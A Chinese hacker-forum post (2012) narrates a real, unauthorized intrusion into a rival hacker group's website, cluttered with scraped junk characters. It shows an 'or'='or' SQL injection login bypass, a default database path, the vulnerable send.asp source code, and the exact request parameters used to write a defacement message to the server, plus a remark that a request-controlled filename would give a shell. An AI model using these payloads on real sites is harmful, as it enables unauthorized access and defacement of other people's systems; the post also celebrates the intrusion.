|
|
有些朋友对我和云中鹰搞华东的过程比较感兴趣,其实那个很没技术含量+ [% Y, r4 A( C0 \
今天闲着无聊,把手上的项目葛一下,来论坛放松一下,顺便说说上次搞华东黑客联盟到装B的过程
. @8 C! V5 R y- ^% B这天云中鸡说华东的某人很牛X,利用JPG黑站大法把恶灵战队黑了,还发了个demo出来
4 S/ l1 S; U$ j) R. _, n我去看了一下demo,感觉很黑客,于是就和云中鸡搞了一下华东
, V' Z5 T' @6 y: H, q6 E; X4 @首先,我记得华东只被人搞过一次(记性不好,原谅下~~),所以应该防护还是比较好的; r8 l4 d7 Q! n( A3 o: p0 Z! x
服务器应该防ARP,不过这还只是猜测
3 L. k1 F8 Y7 A) I6 c' t: p云中鸡说先不搞C段,PZ一下再说$ R9 A+ ] b% m6 X0 Z
然后我就打开了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]
: R! S% U5 \! x i1 z7 ~一看,我晕,怎么网站变了................以前我比较喜欢到华东去看动画,现在怎么变成这鸟样了,晕..............
- k1 d9 f8 y& B/ F- p这时候云中鸡丢了一个同F的站过来,说进了后台搞不了shell
r" L# ~7 G/ k, d; N9 ~9 G+ a; I我看了下搞到了一个webshell出来(这里涉及点技巧,不过不是重点,故省略....),登上webshell后发现服务器的权限很BT- K6 _6 t6 p- t M1 E
然后我就把shell丢给云中鸡去提权,过了一会儿找到了一个二级玉米的站shop.xiahack.cn
2 s% g' }5 \" C4 T8 X4 K& H看着是用eshop来架设的网店,虽然不是同F,但还是想搞下他看有什么可利用的地方,用了几个0day去搞发现不是最新版,0day用不鸟; y1 X7 J# z8 s4 r. ?* {) t e
问了下云中鸡提权怎样了,他说还在努力,装不鸟B就不睡觉,晕了,这下入侵陷入了僵局...............- o7 ^/ B" o2 w! M& F- E' g) h
无聊到网上乱逛,这时无意中发现一个阿拉伯XXXXXX,具体就不说啥鸟,呵呵~~% k# m0 Q. v! U# q
然后阿拉伯黑客发现了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]上有个xia的目录很可疑,于是我就去看看是什么: M" |4 O; K. g1 k$ \7 \
打开一看,如图1所示。
( J9 {8 S) V6 a+ {0 R5 U0 E5 r, j5 B" }( d
http://00day.cn/forum/attachment/thumb/6_1_a8d665f343765b2.jpg, w$ x4 x [: |6 m
我靠~~这啥东西?这么帅?点进去一看,如图2所示。
/ I" K, h4 _: s+ X- A
* T( Q6 m- g8 W2 x http://00day.cn/forum/attachment/thumb/6_1_d741c5c7b6b8a48.jpg& X6 p- _9 `+ r5 y/ E; H3 u' u9 o
太帅了,真YD!!" Y$ S- Y. e) D# B: r8 r+ l" ]% S
这个页面应该是一套个人主页程序,而且还挺炫的!3 B$ s1 h" m$ M$ ^
这个页面有发表日志的地方,应该可能存在登陆页面,找了一轮后发现当鼠标放到网页顶端的时候就会弹出登陆页面,如图3所示。! d/ Q5 j, ]" o. B* w- d
0 A/ Y9 W$ Z7 s
http://00day.cn/forum/attachment/6_1_b03700cb2fe5d52.jpg G6 M/ |5 G5 J, E* U% y, _
嘿嘿,试着'or'='or'居然进去了!!如图4所示。
w8 f9 e( L+ _& ^' y9 w) H( }4 b" `# b8 I" C+ n
http://00day.cn/forum/attachment/6_1_7107004af344a3c.jpg- ~7 C i' z. M3 o6 _* N" K
经过半个多小时的摸索,还是没有发现可利用的地方。
2 P) h3 f1 y8 a# u9 y" ~6 x这下郁闷了,不管了,把这套程序下载下来看看吧
1 V4 i0 h6 X: I+ @# b0 H) b找了一会才知道这套程序叫做“V时代个人flash主页”
2 F. D) [& [$ L2 b" D3 c+ {到官方下了套最新版,然后找了一下可利用的地方,不一会,我发现“/html/admin”这个目录很可能可以利用3 m3 @+ H n/ e/ u$ f6 u# [" f% W
于是马上打开链接标记[url=http://www.3hack.com/xia/html/adminhttp://www.3hack.com/xia/html/admin[/url[/url]]( a; S4 Q2 r2 R8 U) o+ b8 b
返回的确实找不到页面,郁闷了,输入链接标记[url=http://www.3hack.com/xia/html/http://www.3hack.com/xia/html/[/url[/url]]
" \$ J9 I4 c# {, Z# |3 ^$ V( D同样是找不到页面,真晕!再看看!
: f/ O6 }0 t$ f( Y5分钟过后,我发现后台地址是“/asp”,默认数据库是“/asp/vshidai.mdb”,嘿嘿!这下你不死定了!* W: A+ {! n5 [
马上打开链接标记[url=http://www.3hack.com/xia/asp/vshidai.mdbhttp://www.3hack.com/xia/asp/vshidai.mdb[/url[/url]],我晕!服务器居然设置了mdb后缀映射,下载不了!% ?! C; n0 k3 p6 I! |/ |
打开链接标记[url=http://www.3hack.com/xia/asp/http://www.3hack.com/xia/asp/[/url[/url]],发现返回空白,这下我真是服了!& _! [* M$ p; Z
希望快覆灭了,这时我点到了根目录下的send.asp文件,看到里面存在着一个有意思的东西,代码如下:8 a- K8 u/ x& w' \7 L; X( {
7 e+ q) {2 t( a2 }3 e
var a @9 s$ D' ~, T& Y: @# j. n
var b
: s/ f, X9 `. c4 h0 fvar tx
2 ~: s( M) v# m9 X2 {$ ?var clean
3 [' k) o) q: }6 {* xa=Request("re")
4 r$ d9 Z. S' `& n* t9 Wclean=Request("clean"); s) F5 A5 E6 g F% Q
var jian="test.txt" p' F6 F2 O6 l; w# a9 h8 l! N
6 q' f. E+ ?+ e! e8 n/ h: A5 Z& yif(clean==1){% w. U/ a3 I5 D9 @* I# q
tx="&a="# F( P6 Q/ m/ i! k5 \5 s- v. i8 P% V
var fs2
3 y, l* I8 m7 X% Pvar fs2=Server.CreateObject("Scripting.FileSystemObject")
( M* t' M+ L1 p. N6 v: @var newdt=fs2.OpenTextFile(Server.MapPath(jian),2,true), V! N: }; _/ f4 U6 F
newdt.WriteLine("&a=")
9 {5 w2 O+ ~$ s# ~5 Knewdt.close()* P( G4 W M- f
}$ |" |) a! t/ ~) j$ y- U/ P( a7 p4 {
8 {4 H1 M* ]' xif(clean==0|clean==1){
- z" L% F( ^6 z2 i" @2 xtx=""% i' v# O T) W+ b C
var fso = Server.Createobject("Scripting.FileSystemObject")
2 @+ B% W2 E0 e& _% z) Q" Q% Wvar file = fso.OpenTextFile(Server.Mappath(jian))* r0 ~; D9 G3 D8 @% g8 ]
while (!file.AtEndOfStream){
* S Y9 d8 o( x/ U& J p1 Ftx=file.ReadLine()8 O& T A5 T2 H& l
Response.write (tx)1 ^4 z/ l" ]+ \6 b
}" o, C% ?+ K. c. X# }6 S/ e
Response.write ("&")
( J! c- F, A4 n. V6 ofile.close()
6 P7 T& h3 ^; Q, f: @* ]}# V- q J8 {+ L5 N5 M S U8 e
/ d9 K! ^" d+ T, s' @( D* E
if(clean==2){ v+ @! T. y! g4 m2 m6 i
tx=""
$ O! J. [5 T' x8 @var fso = Server.Createobject("Scripting.FileSystemObject")
+ P7 j* k2 Q$ w1 l4 K+ j! ovar file = fso.OpenTextFile(Server.Mappath(jian))
) g" S, Y7 r' t. R2 J, a( o: a7 @+ X% d: M, s8 X3 m; S
var fs2/ F% q4 u) D. b% Q1 i
var fs2=Server.CreateObject("Scripting.FileSystemObject")
" T1 H# V3 d, {& w6 Q) j/ l8 ivar newdt=fs2.OpenTextFile(Server.MapPath(jian),8,true)
; T0 h$ ]$ m$ R& [
4 V2 v6 i# d6 }9 Z- `6 Y. j/ h8 c; x4 }9 g, l U) s
while (!file.AtEndOfStream){
. P: i% p* ~' o" `* Ztx=file.ReadLine(), V- {/ z" W. C; \! r& @ \
Response.write (tx)}
: C, O" q5 J! }6 T- l3 f2 g
7 o& c7 S/ M( EResponse.write (a+"&")# z( O4 `/ X- l" o3 V
newdt.WriteLine(a)
- N0 w: l- }: q4 ~: M2 p2 o% J5 A
file.close()
' K8 {) s5 j" d* \' U# lnewdt.close()8 e K/ x D( J! r
}
$ a0 b/ F, P0 t6 T0 z! K
. ?8 Y7 `1 A) p! l! A8 y H. e: { k- M' V0 m9 o3 n
复制代码% p2 Z5 f. }8 J, y
这下应该可以装B了!从代码看出,我们首先要提交“send.asp?clean=1”来创建一个名为test.txt的文件,文件里面写着“&a=&”, q- b1 R+ J6 d$ v- a
接下来我们提交“send.asp?clean=2&re=H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”! G6 `" ]8 g; ]2 d/ Y
这样就能在test.txt文件里新建一行并写入“H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”这句话
( _4 ]: ~9 z5 C% {% K% |" U过程如图5、6所示。
; n b# D# Z: y$ [# [/ l
" D2 a- g. g5 M" F: @http://00day.cn/forum/attachment/thumb/6_1_cd66a1c03f6682b.jpg
* d/ E0 O5 P% n+ f7 L" C & o5 K4 F3 E* n. I& J0 { N4 _
http://00day.cn/forum/attachment/thumb/6_1_942adfb1ce45224.jpg' t/ c5 z& Z0 y9 a
提交后我们打开链接标记[url=http://www.3hack.com/xia/test.txtwww.3hack.com/xia/test.txt[/url[/url]]看看,如图7所示。) d- s, ?+ q! u, `1 J7 ?
: D; E/ O/ q4 P# a2 d: A9 I
http://00day.cn/forum/attachment/thumb/6_1_10f60a12650b618.jpg! J/ H z- z7 e. J1 M2 O
这下终于可以装到X了,如果不是V时代的作者写的send.asp代码存在问题,拿到shell是不难的
6 X; }) L% O) |+ L# v. ~$ B如果jian是经过request取值的话,同样也能搞到shell。1 y; |7 U9 [( H% J4 x! F/ {& H
这次只是装到了X,并没有拿到shell+ s0 }7 [- \6 x4 x3 i3 P
已经是凌晨了,跟云中J说了声就睡觉去鸟
3 {# k1 [1 L; E, ~估计那B可能搞到了权限,不过我没问他,最近事情比较多,也比较忙/ L4 V @, V* k3 i% S- ]& t/ D
就到这里吧,没技术含量,纯粹装X,高手们见笑了
. I8 @% C8 v* ^3 C# i1 L另外劝告某些认为上传个JPG就能黑到站的大黑客,你这样自欺欺人吃亏的是你自己7 ~# B5 {+ v1 x/ `; r6 U! i) H% {, x
自己学不到技术,却还在自欺欺人: j: }/ t: R% }( X
不说了,本文到这里,最后感谢一下阿拉伯黑客,原来阿拉伯黑客也是很强大的,好了,猪大家愉快~~
0 u' b; a7 [0 F- }* Y' t+ {
5 }& Z& v0 A" V( N0 J' `& s" y |
|
发表于 2012-11-6 21:06:10
收藏
支持
反对